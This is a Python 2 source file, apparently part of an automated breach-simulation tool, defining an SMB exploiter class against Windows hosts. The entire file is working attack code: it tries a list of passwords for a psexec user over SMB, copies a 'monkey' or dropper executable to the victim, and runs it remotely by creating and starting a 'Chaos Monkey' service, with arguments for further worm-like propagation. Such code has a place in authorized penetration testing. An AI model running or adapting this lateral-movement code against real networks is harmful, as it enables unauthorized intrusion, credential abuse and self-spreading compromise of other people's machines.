158 lines
5.9 KiB
Python
158 lines
5.9 KiB
Python
import sys
|
|
from logging import getLogger
|
|
from model.host import VictimHost
|
|
from model import MONKEY_CMDLINE_DETACHED, DROPPER_CMDLINE_DETACHED
|
|
from exploit import HostExploiter
|
|
from network.tools import check_port_tcp
|
|
from exploit.tools import SmbTools, get_target_monkey
|
|
from network import SMBFinger
|
|
|
|
try:
|
|
from impacket import smb
|
|
from impacket import uuid
|
|
from impacket.dcerpc import dcerpc
|
|
from impacket.dcerpc.v5 import transport, scmr
|
|
from impacket.smbconnection import SessionError as SessionError1, SMB_DIALECT
|
|
from impacket.smb import SessionError as SessionError2
|
|
from impacket.smb3 import SessionError as SessionError3
|
|
except ImportError, exc:
|
|
print str(exc)
|
|
print 'Install the following library to make this script work'
|
|
print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
|
|
print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
|
|
sys.exit(1)
|
|
|
|
|
|
LOG = getLogger(__name__)
|
|
|
|
|
|
class SmbExploiter(HostExploiter):
|
|
_target_os_type = ['windows']
|
|
|
|
KNOWN_PROTOCOLS = {
|
|
'139/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 139),
|
|
'445/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 445),
|
|
}
|
|
USE_KERBEROS = False
|
|
|
|
def __init__(self):
|
|
self._config = __import__('config').WormConfiguration
|
|
|
|
def is_os_supported(self, host):
|
|
if host.os.get('type') in self._target_os_type:
|
|
return True
|
|
|
|
if not host.os.get('type'):
|
|
is_smb_open,_ = check_port_tcp(host.ip_addr, 445)
|
|
if is_smb_open:
|
|
smb_finger = SMBFinger()
|
|
smb_finger.get_host_fingerprint(host)
|
|
else:
|
|
is_nb_open,_ = check_port_tcp(host.ip_addr, 139)
|
|
if is_nb_open:
|
|
host.os['type'] = 'windows'
|
|
return host.os.get('type') in self._target_os_type
|
|
return False
|
|
|
|
def exploit_host(self, host, depth=-1, src_path=None):
|
|
assert isinstance(host, VictimHost)
|
|
|
|
src_path = src_path or get_target_monkey(host)
|
|
|
|
if not src_path:
|
|
LOG.info("Can't find suitable monkey executable for host %r", host)
|
|
return False
|
|
|
|
passwords = list(self._config.psexec_passwords[:])
|
|
known_password = host.get_credentials(self._config.psexec_user)
|
|
if known_password is not None:
|
|
if known_password in passwords:
|
|
passwords.remove(known_password)
|
|
passwords.insert(0, known_password)
|
|
|
|
exploited = False
|
|
for password in passwords:
|
|
try:
|
|
# copy the file remotely using SMB
|
|
remote_full_path = SmbTools.copy_file(host,
|
|
self._config.psexec_user,
|
|
password,
|
|
src_path,
|
|
self._config.dropper_target_path)
|
|
|
|
if remote_full_path is not None:
|
|
LOG.debug("Successfully logged in %r using SMB (%s : %s)",
|
|
host, self._config.psexec_user, password)
|
|
host.learn_credentials(self._config.psexec_user, password)
|
|
exploited = True
|
|
break
|
|
|
|
except Exception, exc:
|
|
LOG.debug("Error logging into victim %r with user"
|
|
" %s and password '%s': (%s)", host,
|
|
self._config.psexec_user, password, exc)
|
|
continue
|
|
|
|
if not exploited:
|
|
LOG.debug("Exploiter SmbExec is giving up...")
|
|
return False
|
|
|
|
# execute the remote dropper in case the path isn't final
|
|
if remote_full_path.lower() != self._config.dropper_target_path.lower():
|
|
cmdline = DROPPER_CMDLINE_DETACHED % {'dropper_path': remote_full_path}
|
|
else:
|
|
cmdline = MONKEY_CMDLINE_DETACHED % {'monkey_path': remote_full_path}
|
|
|
|
if host.default_tunnel:
|
|
cmdline += " -t " + host.default_tunnel
|
|
if host.default_server:
|
|
cmdline += " -s " + host.default_server
|
|
if depth > 0:
|
|
cmdline += " -d %d" % (depth - 1)
|
|
|
|
for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values():
|
|
rpctransport = transport.DCERPCTransportFactory(str_bind_format % (host.ip_addr, ))
|
|
rpctransport.set_dport(port)
|
|
|
|
if hasattr(rpctransport,'preferred_dialect'):
|
|
rpctransport.preferred_dialect(SMB_DIALECT)
|
|
if hasattr(rpctransport, 'set_credentials'):
|
|
# This method exists only for selected protocol sequences.
|
|
rpctransport.set_credentials(self._config.psexec_user, password, host.ip_addr,
|
|
"", "", None)
|
|
rpctransport.set_kerberos(SmbExploiter.USE_KERBEROS)
|
|
|
|
scmr_rpc = rpctransport.get_dce_rpc()
|
|
|
|
try:
|
|
scmr_rpc.connect()
|
|
except Exception, exc:
|
|
LOG.warn("Error connecting to SCM on exploited machine %r: %s",
|
|
host, exc)
|
|
return False
|
|
|
|
smb_conn = rpctransport.get_smb_connection()
|
|
|
|
# We don't wanna deal with timeouts from now on.
|
|
smb_conn.setTimeout(100000)
|
|
scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)
|
|
resp = scmr.hROpenSCManagerW(scmr_rpc)
|
|
sc_handle = resp['lpScHandle']
|
|
|
|
# start the monkey using the SCM
|
|
resp = scmr.hRCreateServiceW(scmr_rpc, sc_handle, "Chaos Monkey", "Chaos Monkey",
|
|
lpBinaryPathName=cmdline)
|
|
service = resp['lpServiceHandle']
|
|
|
|
try:
|
|
scmr.hRStartServiceW(scmr_rpc, service)
|
|
except:
|
|
pass
|
|
scmr.hRDeleteService(scmr_rpc, service)
|
|
scmr.hRCloseServiceHandle(scmr_rpc, service)
|
|
|
|
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
|
|
remote_full_path, host, cmdline)
|
|
|
|
return True
|